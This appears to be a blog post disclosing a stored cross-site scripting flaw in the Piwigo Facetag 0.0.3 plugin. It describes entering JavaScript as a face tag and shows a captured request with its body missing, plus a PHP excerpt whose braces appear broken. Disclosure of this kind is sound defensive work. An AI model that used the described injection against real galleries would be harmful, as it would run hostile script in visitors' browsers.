Skip to content

Piwigo Plugin Facetag 0.0.3 – Stored Cross-Site Scripting

Piwigo is photo gallery software for the web, built by an active community of users and developers.Extensions make Piwigo easily customizable. Icing on the cake, Piwigo is free and open source.

Facetag Extension in piwigo.
This plugin extends piwigo with the function to tag faces in pictures. It adds an additional button on photo pages that let you tag a face on the picture.

######## ATTACK DESCRIPTION ########


Facetag Extension provide additional button on photo page for visitor or user to tag any name oh that image.
NOTE : “www.test.touhid” this domain not register on internet. This domain host in touhid’s local machine.


Any visitor or registered user can perform this.


FaceTag Extension adds an additional button on photo pages that let you tag a face on the picture for visitor and registered user.


stored xss


click on that button after that click on image where you want to tag a name just enter you malicious javascript and press Enter its stored as a keyword.

Your Javascript Stored in Server’s Database and execute every time when any visitor visit that photo or in keyword page.


######## Proof of Concept ########

Your Request look like bellow.

—————————–OUR REQUEST————–
POST /ws.php?format=json&method=facetag.changeTag HTTP/1.1
Host: www.test.touhid
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.test.touhid/picture.php?/12/category/3
Content-Length: 129
Cookie: pwg_id=9i94hdpsn2dfulaecm6hqvsj77
Connection: close
Pragma: no-cache
Cache-Control: no-cache


—————————END HERE—————————

Stored in database.(SQl query to stored tag in dataabase)
——————-ws_function.php(facetag plugin)————–

function facetag_changeTag($params, &$service) {
if (!$service->isPost()) {
return new PwgError(405, "This method requires HTTP POST");

$id = $params['id'];

$answer = array();
if($id < 0) {
$answer['action'] = "INSERT";
$answer['id'] = addImageFaceTag($params['imageId'], $params['name'], $params['top'], $params['left'], $params['width'], $params['height']);
} elseif($params['name'] == "__DELETE__") {
$answer['action'] = "DELETE";
$answer['id'] = removeImageFaceTag($id, $params['imageId']);
} else {
$answer['action'] = "UPDATE";
removeImageFaceTag($id, $params['imageId']);
$answer['id'] = addImageFaceTag($params['imageId'], $params['name'], $params['top'], $params['left'], $params['width'], $params['height']);

return json_encode($answer);

————————–END HERE—————————


Published inPoC

One Comment

  1. Johne294 Johne294

    There are some interesting closing dates on this article however bfeeaaefegka

Leave a Reply

Your email address will not be published. Required fields are marked *